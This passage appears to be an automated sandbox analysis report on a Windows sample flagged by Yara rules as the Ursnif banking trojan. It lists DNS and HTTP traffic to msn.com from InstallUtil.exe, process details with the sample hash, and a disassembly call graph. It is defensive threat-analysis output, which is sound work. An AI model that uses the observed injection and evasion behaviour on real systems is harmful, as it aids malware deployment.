                                                          May 19, 2022 14:41:40.197166920 CEST5122953192.168.2.38.8.8.8
                                                          May 19, 2022 14:41:40.389507055 CEST6485153192.168.2.38.8.8.8
                                                          May 19, 2022 14:41:40.408665895 CEST53648518.8.8.8192.168.2.3

                                                          DNS Queries

                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                          May 19, 2022 14:41:40.197166920 CEST192.168.2.38.8.8.80x918eStandard query (0)anm.msn.comA (IP address)IN (0x0001)
                                                          May 19, 2022 14:41:40.389507055 CEST192.168.2.38.8.8.80x35aStandard query (0)www.msn.comA (IP address)IN (0x0001)

                                                          DNS Answers

                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                          May 19, 2022 14:41:40.229801893 CEST8.8.8.8192.168.2.30x918eNo error (0)anm.msn.comredirection.prod.cms.msn.comCNAME (Canonical name)IN (0x0001)
                                                          May 19, 2022 14:41:40.229801893 CEST8.8.8.8192.168.2.30x918eNo error (0)redirection.prod.cms.msn.comredirection.prod.cms.msn.com.akadns.netCNAME (Canonical name)IN (0x0001)
                                                          May 19, 2022 14:41:40.408665895 CEST8.8.8.8192.168.2.30x35aNo error (0)www.msn.comwww-msn-com.a-0003.a-msedge.netCNAME (Canonical name)IN (0x0001)
                                                          May 19, 2022 14:41:40.408665895 CEST8.8.8.8192.168.2.30x35aNo error (0)www-msn-com.a-0003.a-msedge.neticePrime.a-0003.dc-msedge.netCNAME (Canonical name)IN (0x0001)
                                                          May 19, 2022 14:41:40.408665895 CEST8.8.8.8192.168.2.30x35aNo error (0)icePrime.a-0003.dc-msedge.neta-0003.fbs2-a-msedge.netCNAME (Canonical name)IN (0x0001)
                                                          May 19, 2022 14:41:40.408665895 CEST8.8.8.8192.168.2.30x35aNo error (0)a-0003.fbs2-a-msedge.net13.107.40.203A (IP address)IN (0x0001)

                                                          HTTP Request Dependency Graph

                                                          • www.msn.com

                                                          HTTP Packets

                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                          0192.168.2.34970313.107.40.20380C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                          TimestampkBytes transferredDirectionData
                                                          May 19, 2022 14:41:40.455178022 CEST109OUTGET / HTTP/1.1
                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                                                          Connection: Keep-Alive
                                                          Cache-Control: no-cache
                                                          Host: www.msn.com
                                                          May 19, 2022 14:41:40.559830904 CEST110INHTTP/1.1 302 Found
                                                          Cache-Control: no-cache, no-store, no-transform
                                                          Pragma: no-cache
                                                          Content-Length: 142
                                                          Content-Type: text/html; charset=utf-8
                                                          Expires: -1
                                                          Location: http://www.msn.com/de-ch/
                                                          Vary: User-Agent
                                                          Set-Cookie: PreferencesMsn=eyJIb21lUGFnZSI6eyJTdHJpcGVzIjpbXSwiTWVTdHJpcGVNb2R1bGVzIjpbXSwiTWFya2V0Q29uZmlndXJhdGlvbiI6eyJNYXJrZXQiOiJkZS1jaCIsIlN1cHByZXNzUHJvbXB0IjpmYWxzZSwiUHJlZmVycmVkTGFuZ3VhZ2VDb2RlIjoiZGUtZGUiLCJDb3VudHJ5Q29kZSI6IkNIIn19LCJFeHBpcnlUaW1lIjo2MzgyMDA5NjkwMDQ5NzI5NzksIlZlcnNpb24iOjF90; domain=msn.com; expires=Fri, 19-May-2023 12:41:40 GMT; path=/; HttpOnly
                                                          Set-Cookie: marketPref=de-ch; domain=msn.com; expires=Fri, 19-May-2023 12:41:40 GMT; path=/; HttpOnly
                                                          Access-Control-Allow-Origin: *
                                                          X-AspNetMvc-Version: 5.2
                                                          X-AppVersion: 20220517_28677693
                                                          X-Activity-Id: efab37a0-e368-4926-ad9f-55ad4ca02ec9
                                                          X-Az: {did:2be360ae5c6345da911d978376c0449f, rid: 20, sn: neurope-prod-hp, dt: 2022-05-18T22:13:14.6536596Z, bt: 2022-05-17T20:41:53.5606999Z}
                                                          nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
                                                          report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
                                                          X-UA-Compatible: IE=Edge;chrome=1
                                                          X-Content-Type-Options: nosniff
                                                          X-FRAME-OPTIONS: SAMEORIGIN
                                                          X-Powered-By: ASP.NET
                                                          Ac
                                                          Data Raw:
                                                          Data Ascii:
                                                          May 19, 2022 14:41:40.559859991 CEST111INData Raw: 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 4d 65 74 68 6f 64 73 3a 20 48 45 41 44 2c 47 45 54 2c 4f 50 54 49 4f 4e 53 0d 0a 58 2d 58 53 53 2d 50 72 6f 74 65 63 74 69 6f 6e 3a 20 31 0d 0a 58 2d 43 61 63 68 65 3a 20 43 4f 4e 46 49 47 5f
                                                          Data Ascii: ess-Control-Allow-Methods: HEAD,GET,OPTIONSX-XSS-Protection: 1X-Cache: CONFIG_NOCACHEX-MSEdge-Ref: Ref A: EFAB37A0E3684926AD9F55AD4CA02EC9 Ref B: HEL01EDGE1020 Ref C: 2022-05-19T12:41:40ZDate: Thu, 19 May 2022 12:41:39 GMT<html><he
                                                          May 19, 2022 14:41:40.597235918 CEST111OUTGET /de-ch/ HTTP/1.1
                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                                                          Connection: Keep-Alive
                                                          Cache-Control: no-cache
                                                          Host: www.msn.com
                                                          Cookie: PreferencesMsn=eyJIb21lUGFnZSI6eyJTdHJpcGVzIjpbXSwiTWVTdHJpcGVNb2R1bGVzIjpbXSwiTWFya2V0Q29uZmlndXJhdGlvbiI6eyJNYXJrZXQiOiJkZS1jaCIsIlN1cHByZXNzUHJvbXB0IjpmYWxzZSwiUHJlZmVycmVkTGFuZ3VhZ2VDb2RlIjoiZGUtZGUiLCJDb3VudHJ5Q29kZSI6IkNIIn19LCJFeHBpcnlUaW1lIjo2MzgyMDA5NjkwMDQ5NzI5NzksIlZlcnNpb24iOjF90; marketPref=de-ch
                                                          May 19, 2022 14:41:40.899105072 CEST113INHTTP/1.1 200 OK
                                                          Cache-Control: no-cache, no-store, no-transform
                                                          Pragma: no-cache
                                                          Content-Length: 336579
                                                          Content-Type: text/html; charset=utf-8
                                                          Expires: -1
                                                          Vary: User-Agent
                                                          Set-Cookie: PreferencesMsn=eyJFeHBpcnlUaW1lIjo2MzgyMDA5NjkwMDYzNzkyNDAsIlZlcnNpb24iOjF90; domain=msn.com; expires=Fri, 19-May-2023 12:41:40 GMT; path=/; HttpOnly
                                                          Access-Control-Allow-Origin: *
                                                          X-AspNetMvc-Version: 5.2
                                                          X-AppVersion: 20220517_28677693
                                                          X-Activity-Id: ded43fef-0e10-4ef5-a726-676e283054af
                                                          X-Az: {did:2be360ae5c6345da911d978376c0449f, rid: 20, sn: neurope-prod-hp, dt: 2022-05-18T22:13:14.6536596Z, bt: 2022-05-17T20:41:53.5606999Z}
                                                          nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
                                                          report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
                                                          X-UA-Compatible: IE=Edge;chrome=1
                                                          X-Content-Type-Options: nosniff
                                                          X-FRAME-OPTIONS: SAMEORIGIN
                                                          X-Powered-By: ASP.NET
                                                          Access-Control-Allow-Methods: HEAD,GET,OPTIONS
                                                          X-XSS-Protection: 1
                                                          X-Cache: CONFIG_NOCACHE
                                                          X-MSEdge-Ref: Ref A: DED43FEF0E104EF5A726676E283054AF Ref B: HEL01EDGE1020 Ref C: 2022-05-19T12:41:40Z
                                                          Date: Thu, 19 May 2022 12:41:40 GMT
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 70 72 65 66 69 78 3d 22 6f 67 3a 20 68 74 74 70 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 23 20 66 62 3a 20 68 74 74 70 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 2f 66 62 23 22 20 20 6c 61 6e 67 3d 22 64 65 2d 43 48 22 20 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 36 32 2e 35 25 22 20 20 63 6c 61 73
                                                          Data Ascii: <!DOCTYPE html><html prefix="og: http://ogp.me/ns# fb: http://ogp.me/ns/fb#" lang="de-CH" style="font-size:62.5%" clas
                                                          May 19, 2022 14:41:40.899158001 CEST114INData Raw: 73 3d 22 68 69 70 65 72 66 22 20 20 64 69 72 3d 22 6c 74 72 22 20 3e 0a 0a 20 20 20 20 3c 68 65 61 64 20 64 61 74 61 2d 69 6e 66 6f 3d 22 76 3a 32 30 32 32 30 35 31 37 5f 32 38 36 37 37 36 39 33 3b 61 3a 64 65 64 34 33 66 65 66 2d 30 65 31 30 2d
                                                          Data Ascii: s="hiperf" dir="ltr" > <head data-info="v:20220517_28677693;a:ded43fef-0e10-4ef5-a726-676e283054af;cn:20;az:{did:2be360ae5c6345da911d978376c0449f, rid: 20, sn: neurope-prod-hp, dt: 2022-05-18T22:13:14.6536596Z, bt: 2022-05-17T20:41:53.56
                                                          May 19, 2022 14:41:40.899624109 CEST115INData Raw: 6c 65 61 70 69 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 68 74 74 70 3a 2f 2f 77 77 77 2e 6d 73 6e 2e 63 6f 6d 2f 64 65 2d 63 68 2f 68 6f 6d 65 70 61 67 65 2f 61 70 69 2f 6d 6f 64 75 6c 65 73 2f 66 65 74 63 68 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b
                                                          Data Ascii: leapi&quot;:&quot;http://www.msn.com/de-ch/homepage/api/modules/fetch&quot;,&quot;cdnmoduleapi&quot;:&quot;http://static-global-s-msn-com.akamaized.net/de-ch/homepage/api/modules/cdnfetch&quot;,&quot;pdpdeltaupdateapi&quot;:&quot;http://www.ms
                                                          May 19, 2022 14:41:40.899843931 CEST117INData Raw: 6d 66 61 63 74 6f 72 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 64 65 73 6b 74 6f 70 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 64 6f 6d 61 69 6e 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 77 77 77 2e 6d 73 6e 2e 63 6f 6d 26 71 75 6f 74 3b 2c 26 71 75 6f 74
                                                          Data Ascii: mfactor&quot;:&quot;desktop&quot;,&quot;domain&quot;:&quot;www.msn.com&quot;,&quot;locale&quot;:{&quot;language&quot;:&quot;de&quot;,&quot;script&quot;:&quot;&quot;,&quot;market&quot;:&quot;ch&quot;},&quot;os&quot;:&quot;windows&quot;,&quot;pa
                                                          May 19, 2022 14:41:40.899981022 CEST118INData Raw: 72 65 73 68 5f 63 6f 75 6e 74 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 30 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 61 6a 61 78 74 69 6d 65 6f 75 74 69 6e 73 65 63 6f 6e 64 73 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 36 30 26 71 75 6f 74 3b 7d 2c 26 71
                                                          Data Ascii: resh_count&quot;:&quot;0&quot;,&quot;ajaxtimeoutinseconds&quot;:&quot;60&quot;},&quot;imgsrc&quot;:{&quot;quality_high&quot;:&quot;60&quot;,&quot;quality_low&quot;:&quot;5&quot;,&quot;order_timeout&quot;:&quot;1000&quot;},&quot;adsettings&quot
                                                          May 19, 2022 14:41:40.900139093 CEST119INData Raw: 29 20 7b 20 69 66 20 28 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 2e 70 65 72 66 6f 72 6d 61 6e 63 65 2e 6d 61 72 6b 20 3d 3d 20 22 66 75 6e 63 74 69 6f 6e 22 29 20 7b 20 77 69 6e 64 6f 77 2e 70 65 72 66 6f 72 6d 61 6e 63 65 2e 6d 61 72 6b 28 22 54
                                                          Data Ascii: ) { if (typeof window.performance.mark == "function") { window.performance.mark("TimeToHeadStart"); } }</script> <meta charset="utf-8" /> <meta name="robots" content="index, follow"/> <link rel="preload" href
                                                          May 19, 2022 14:41:40.900228977 CEST121INData Raw: 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 73 74 61 74 69 63 2d 67 6c 6f 62 61 6c 2d 73 2d 6d 73 6e 2d 63 6f 6d 2e 61 6b 61 6d 61 69 7a 65 64 2e 6e 65 74 2f 68 70 2d 6e 65 75 2f 64 65 2d 63 68 2f 68 6f
                                                          Data Ascii: el="stylesheet" href="http://static-global-s-msn-com.akamaized.net/hp-neu/de-ch/homepage/_sc/css/d7cb56b9-/direction=ltr.locales=de-ch.themes=start.dpi=resolution1x/e2-71f5b2-345a9e05/e5-356483-1afafcc5/7f-145015-491caa4c/8b-ebeae2-377c9bd6/84
                                                          May 19, 2022 14:41:40.900367022 CEST122INData Raw: 65 2c 68 5b 65 5d 3d 74 29 2c 74 7d 66 75 6e 63 74 69 6f 6e 20 6c 28 6e 2c 72 2c 75 29 7b 69 66 28 72 7c 7c 28 72 3d 74 29 2c 69 29 72 65 74 75 72 6e 20 72 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 6e 29 3b 75 7c 7c 28 75 3d 6f 28 72 29 29 3b
                                                          Data Ascii: e,h[e]=t),t}function l(n,r,u){if(r||(r=t),i)return r.createElement(n);u||(u=o(r));var f;return f=u.cache[n]?u.cache[n].cloneNode():y.test(n)?(u.cache[n]=u.createElem(n)).cloneNode():u.createElem(n),f.canHaveChildren&&!v.test(n)?u.frag.appendCh
                                                          May 19, 2022 14:41:40.900387049 CEST122INData Raw: 28 22 61 22 29 3b 6e 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 3c 78 79 7a 3e 3c 5c 2f 78 79 7a 3e 22 3b 66 3d 22 68 69 64 64 65 6e 22 69 6e 20 6e 3b 69 3d 6e 2e 63 68 69 6c 64 4e 6f 64 65 73 2e 6c 65 6e 67 74 68 3d 3d 31 7c 7c 66 75 6e 63 74 69 6f 6e
                                                          Data Ascii: ("a");n.innerHTML="<xyz><\/xyz>";f="hidden"in n;i=n.childNodes.length==1||function(){t.createElement("a");var n=t.createDocumentFragment();return typeof n.cloneNode
                                                          May 19, 2022 14:41:40.901165009 CEST124INData Raw: 3d 3d 22 75 6e 64 65 66 69 6e 65 64 22 7c 7c 74 79 70 65 6f 66 20 6e 2e 63 72 65 61 74 65 44 6f 63 75 6d 65 6e 74 46 72 61 67 6d 65 6e 74 3d 3d 22 75 6e 64 65 66 69 6e 65 64 22 7c 7c 74 79 70 65 6f 66 20 6e 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e
                                                          Data Ascii: =="undefined"||typeof n.createDocumentFragment=="undefined"||typeof n.createElement=="undefined"}()}catch(r){f=!0;i=!0}})();r={elements:u.elements||"abbr article aside audio bdi canvas data datalist details figcaption figure footer header hgro


                                                          Statistics

                                                          CPU Usage

                                                          Click to jump to process

                                                          Memory Usage

                                                          Click to jump to process

                                                          Behavior

                                                          Click to jump to process

                                                          System Behavior

                                                          General

                                                          Target ID:0
                                                          Start time:14:39:49
                                                          Start date:19/05/2022
                                                          Path:C:\Users\user\Desktop\OojqjHGE0W.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Users\user\Desktop\OojqjHGE0W.exe"
                                                          Imagebase:0xb20000
                                                          File size:1241656 bytes
                                                          MD5 hash:4ED3FA33609A51BAF209A5954BEF6633
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:low

                                                          General

                                                          Target ID:10
                                                          Start time:14:41:25
                                                          Start date:19/05/2022
                                                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                          Imagebase:0xd80000
                                                          File size:41064 bytes
                                                          MD5 hash:EFEC8C379D165E3F33B536739AEE26A3
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000000A.00000003.504942023.00000000020C8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000000A.00000003.501961576.00000000020C8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000000A.00000003.502032730.00000000020C8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000000A.00000002.535140555.00000000020C8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000000A.00000003.501571456.00000000020C8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000000A.00000003.501753987.00000000020C8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 0000000A.00000002.535054926.0000000001B69000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000000A.00000003.501977722.00000000020C8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000000A.00000003.501825234.00000000020C8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000000A.00000003.501701977.00000000020C8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000000A.00000003.501914236.00000000020C8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                          Reputation:high

                                                          Disassembly

                                                          Reset < >

                                                            Execution Graph

                                                            Execution Coverage:2.7%
                                                            Dynamic/Decrypted Code Coverage:0%
                                                            Signature Coverage:3.3%
                                                            Total number of Nodes:1225
                                                            Total number of Limit Nodes:20
                                                            execution_graph 8943 b37ab0 8944 b37ac5 8943->8944 8945 b37abe 8943->8945 8947 b36f10 8945->8947 8948 b36f4e 8947->8948 8964 b36e00 8948->8964 8950 b36f56 8972 b371b0 8950->8972 8952 b36f68 8958 b3714c 8952->8958 8978 b372c0 8952->8978 8955 b36fd9 InterlockedDecrement 8956 b37007 InterlockedIncrement 8955->8956 8957 b36fea 8955->8957 8956->8958 8960 b3702c 8956->8960 8957->8956 8958->8944 8959 b37100 InterlockedDecrement 8961 b37111 8959->8961 8962 b3712d InterlockedIncrement 8959->8962 8960->8958 8960->8959 8961->8962 8991 b3714e 8962->8991 8965 b36e37 8964->8965 8966 b36ec3 8965->8966 8967 b36e80 InterlockedDecrement 8965->8967 8968 b36ea5 InterlockedIncrement 8965->8968 8971 b36ecf 8965->8971 8994 b36ed1 8966->8994 8967->8968 8970 b36e8e 8967->8970 8968->8966 8970->8968 8971->8950 8973 b371ea 8972->8973 8974 b37201 GetOEMCP 8973->8974 8975 b3722a 8973->8975 8977 b37223 _LocaleUpdate::~_LocaleUpdate __chvalidator_l 8974->8977 8976 b37230 GetACP 8975->8976 8975->8977 8976->8977 8977->8952 8979 b371b0 getSystemCP 2 API calls 8978->8979 8980 b372dc 8979->8980 8981 b37457 8980->8981 8987 b372e8 setSBCS 8980->8987 8988 b3732c __setmbcp 8980->8988 8984 b37474 IsValidCodePage 8981->8984 8981->8987 8982 b3a1a0 ___crtMessageWindowW 5 API calls 8983 b36fc9 8982->8983 8983->8955 8983->8958 8985 b3748b GetCPInfo 8984->8985 8984->8987 8986 b374a1 __setmbcp 8985->8986 8985->8987 8990 b37770 setSBUpLow 16 API calls 8986->8990 8987->8982 8998 b37770 GetCPInfo 8988->8998 8990->8987 9038 b37dc0 LeaveCriticalSection 8991->9038 8993 b37155 8993->8958 8997 b37dc0 LeaveCriticalSection 8994->8997 8996 b36ed8 8996->8971 8997->8996 9002 b377a1 8998->9002 9007 b378ec 8998->9007 8999 b3a1a0 ___crtMessageWindowW 5 API calls 9000 b37aa8 8999->9000 9000->8987 9008 b3b770 9002->9008 9003 b3787e 9012 b3b390 9003->9012 9005 b378b5 9006 b3b390 ___crtLCMapStringA 7 API calls 9005->9006 9006->9007 9007->8999 9009 b3b784 __chvalidator_l 9008->9009 9016 b3b7d0 9009->9016 9011 b3b7ae _LocaleUpdate::~_LocaleUpdate 9011->9003 9013 b3b3a4 __chvalidator_l 9012->9013 9023 b3b3f0 9013->9023 9015 b3b3d2 _LocaleUpdate::~_LocaleUpdate 9015->9005 9017 b3b7f0 MultiByteToWideChar 9016->9017 9018 b3b7e5 9016->9018 9020 b3b827 _memset __MarkAllocaS _malloc 9017->9020 9021 b3b820 __freea 9017->9021 9018->9017 9019 b3b885 MultiByteToWideChar 9019->9021 9022 b3b8ad GetStringTypeW 9019->9022 9020->9019 9020->9021 9021->9011 9022->9021 9024 b3b3fe strncnt 9023->9024 9025 b3b450 MultiByteToWideChar 9024->9025 9026 b3b480 __freea 9025->9026 9027 b3b487 __MarkAllocaS _malloc 9025->9027 9026->9015 9027->9026 9028 b3b4dd MultiByteToWideChar 9027->9028 9028->9026 9029 b3b507 LCMapStringW 9028->9029 9029->9026 9030 b3b534 9029->9030 9031 b3b53f 9030->9031 9035 b3b588 __MarkAllocaS _malloc 9030->9035 9031->9026 9032 b3b557 LCMapStringW 9031->9032 9032->9026 9033 b3b5e1 LCMapStringW 9033->9026 9034 b3b607 9033->9034 9036 b3b638 WideCharToMultiByte 9034->9036 9037 b3b60d WideCharToMultiByte 9034->9037 9035->9026 9035->9033 9036->9026 9037->9026 9038->8993 9114 b3f3b0 9115 b3f3d1 9114->9115 9116 b3f3e3 9114->9116 9115->9116 9117 b36830 FindHandler 34 API calls 9115->9117 9117->9116 9118 b3afb0 9119 b3eac0 ___InternalCxxFrameHandler 37 API calls 9118->9119 9120 b3afdc 9119->9120 9211 b3e730 9212 b3e390 __vsnprintf_s_l 40 API calls 9211->9212 9213 b3e750 9212->9213 9214 b40730 9215 b4073e 9214->9215 9216 b40784 9215->9216 9219 b407b4 _memset 9215->9219 9217 b381d0 __invalid_parameter 11 API calls 9216->9217 9222 b407a7 _memset 9217->9222 9218 b40849 9220 b381d0 __invalid_parameter 11 API calls 9218->9220 9219->9218 9221 b40879 _memset 9219->9221 9220->9222 9223 b40954 9221->9223 9225 b40984 _memset 9221->9225 9224 b381d0 __invalid_parameter 11 API calls 9223->9224 9224->9222 9225->9222 9226 b381d0 __invalid_parameter 11 API calls 9225->9226 9226->9222 8383 b35da0 GetModuleHandleW 8384 b37d80 8383->8384 8385 b35e2d InterlockedIncrement 8384->8385 8392 b35e52 8385->8392 8387 b35e50 8395 b398f0 InterlockedIncrement 8387->8395 8389 b35e98 8407 b35ea9 8389->8407 8410 b37dc0 LeaveCriticalSection 8392->8410 8394 b35e59 8394->8387 8396 b3991c 8395->8396 8397 b3990c InterlockedIncrement 8395->8397 8398 b39938 8396->8398 8399 b39928 InterlockedIncrement 8396->8399 8397->8396 8400 b39954 8398->8400 8401 b39944 InterlockedIncrement 8398->8401 8399->8398 8402 b39960 InterlockedIncrement 8400->8402 8404 b39970 8400->8404 8401->8400 8402->8404 8403 b399f5 InterlockedIncrement 8403->8389 8404->8403 8405 b399ab InterlockedIncrement 8404->8405 8406 b399df InterlockedIncrement 8404->8406 8405->8404 8406->8404 8411 b37dc0 LeaveCriticalSection 8407->8411 8409 b35ea7 8410->8394 8411->8409 8375 b3b1a0 8376 b3a1a0 ___crtMessageWindowW 5 API calls 8375->8376 8377 b3b1b6 8376->8377 8378 b3b1c1 _CallSETranslator 8377->8378 8379 b3eac0 ___InternalCxxFrameHandler 37 API calls 8377->8379 8380 b3b201 8379->8380 8380->8378 8382 b3af50 RtlUnwind 8380->8382 8382->8378 8739 b32520 8740 b32530 8739->8740 8741 b325e0 DecodePointer 8740->8741 8742 b325f8 8741->8742 8747 b35ad0 RtlEncodePointer 8742->8747 8744 b32614 InterlockedDecrement 8745 b32650 InterlockedIncrement 8744->8745 8746 b32629 8744->8746 8746->8745 8747->8744 9039 b32ea0 GetModuleFileNameW 9040 b32ed3 _wparse_cmdline ___wsetargv 9039->9040 9041 b39ea0 9042 b39ed7 9041->9042 9045 b39f26 9042->9045 9047 b39e20 9042->9047 9044 b39f14 9053 b39f28 9044->9053 9048 b39e2c 9047->9048 9052 b39e32 ___freetlocinfo 9047->9052 9049 b398f0 ___addlocaleref 8 API calls 9048->9049 9048->9052 9050 b39e57 9049->9050 9050->9052 9056 b39a10 9050->9056 9052->9044 9070 b37dc0 LeaveCriticalSection 9053->9070 9055 b39f2f 9055->9045 9057 b39a20 InterlockedDecrement 9056->9057 9058 b39b35 9056->9058 9059 b39a46 9057->9059 9060 b39a36 InterlockedDecrement 9057->9060 9058->9052 9061 b39a62 9059->9061 9062 b39a52 InterlockedDecrement 9059->9062 9060->9059 9063 b39a7e 9061->9063 9064 b39a6e InterlockedDecrement 9061->9064 9062->9061 9065 b39a9a 9063->9065 9066 b39a8a InterlockedDecrement 9063->9066 9064->9063 9067 b39b1f InterlockedDecrement 9065->9067 9068 b39ad5 InterlockedDecrement 9065->9068 9069 b39b09 InterlockedDecrement 9065->9069 9066->9065 9067->9058 9068->9065 9069->9065 9070->9055 9121 b353ab 9124 b37dc0 LeaveCriticalSection 9121->9124 9123 b353b2 9124->9123 7835 b2f410 GetProcAddress 7836 b2f45a VirtualProtect 7835->7836 7838 b306ea 7836->7838 7895 b31e90 7896 b31ee6 LoadLibraryW Sleep 7895->7896 7900 b306f0 7896->7900 7904 b2ca50 7900->7904 7902 b3073b GetModuleHandleW 7903 b30ef5 7902->7903 7903->7903 7905 b2ca60 7904->7905 7905->7902 8748 b3f110 8749 b3f121 std::bad_exception::~bad_exception 8748->8749 8750 b3f132 8749->8750 8752 b45570 8749->8752 8753 b455a8 8752->8753 8754 b455ad 8752->8754 8753->8750 8756 b4563a 8754->8756 8759 b37dc0 LeaveCriticalSection 8756->8759 8758 b45641 8758->8753 8759->8758 9071 b33290 GetEnvironmentStringsW 9072 b332a7 9071->9072 9073 b332ae 9071->9073 9074 b33306 FreeEnvironmentStringsW 9073->9074 9075 b33314 _memmove 9073->9075 9074->9072 9076 b33325 FreeEnvironmentStringsW 9075->9076 9076->9072 9086 b36210 9094 b363d0 9086->9094 9088 b363be 9089 b363d0 _ValidateLocalCookies 5 API calls 9089->9088 9090 b362d6 __except_handler4 9090->9088 9090->9089 9092 b36251 __IsNonwritableInCurrentImage __except_handler4 9092->9090 9093 b363d0 _ValidateLocalCookies 5 API calls 9092->9093 9100 b3a2d2 RtlUnwind 9092->9100 9093->9092 9095 b363e0 9094->9095 9096 b36405 9094->9096 9098 b3a1a0 ___crtMessageWindowW 5 API calls 9095->9098 9097 b3a1a0 ___crtMessageWindowW 5 API calls 9096->9097 9099 b3642b 9097->9099 9098->9096 9099->9092 9101 b3a2e6 9100->9101 9101->9092 8412 b41d90 8415 b419e0 8412->8415 8414 b41db0 8417 b41a08 8415->8417 8416 b41a2f 8418 b381d0 __invalid_parameter 11 API calls 8416->8418 8417->8416 8419 b41a60 8417->8419 8428 b41a55 _memset 8418->8428 8420 b41ac8 8419->8420 8421 b41af9 8419->8421 8419->8428 8424 b381d0 __invalid_parameter 11 API calls 8420->8424 8422 b41b05 8421->8422 8423 b41bc2 8421->8423 8430 b41780 8422->8430 8426 b41780 __vswprintf_helper 40 API calls 8423->8426 8424->8428 8427 b41b30 _memset 8426->8427 8427->8428 8429 b381d0 __invalid_parameter 11 API calls 8427->8429 8428->8414 8429->8428 8432 b417be 8430->8432 8431 b417e5 8433 b381d0 __invalid_parameter 11 API calls 8431->8433 8432->8431 8435 b41816 8432->8435 8437 b4180b 8433->8437 8434 b41865 8436 b381d0 __invalid_parameter 11 API calls 8434->8436 8435->8434 8438 b41896 8435->8438 8436->8437 8437->8427 8438->8437 8440 b4191d 8438->8440 8442 b3dc10 8438->8442 8440->8437 8441 b3dc10 __flsbuf 40 API calls 8440->8441 8441->8437 8444 b3dc1e 8442->8444 8456 b436b0 8444->8456 8445 b3dd68 __getbuf 8446 b3de86 8445->8446 8447 b3dd8d 8445->8447 8448 b424e0 __write 40 API calls 8446->8448 8450 b3ddec 8447->8450 8454 b3de08 8447->8454 8453 b3dc5f 8448->8453 8449 b3dc4b __flsbuf 8449->8445 8449->8453 8460 b43320 8449->8460 8464 b424e0 8450->8464 8453->8440 8454->8453 8478 b421a0 8454->8478 8457 b436c8 8456->8457 8458 b4370f 8457->8458 8459 b381d0 __invalid_parameter 11 API calls 8457->8459 8458->8449 8459->8458 8461 b4332e 8460->8461 8462 b43340 8460->8462 8461->8445 8462->8461 8463 b381d0 __invalid_parameter 11 API calls 8462->8463 8463->8461 8465 b42536 8464->8465 8477 b42518 __close 8464->8477 8466 b425c0 8465->8466 8468 b42587 __close 8465->8468 8467 b42646 8466->8467 8471 b4260d __close 8466->8471 8492 b474b0 8467->8492 8472 b381d0 __invalid_parameter 11 API calls 8468->8472 8474 b381d0 __invalid_parameter 11 API calls 8471->8474 8472->8477 8474->8477 8475 b4268a __close 8544 b426df 8475->8544 8477->8453 8479 b421e6 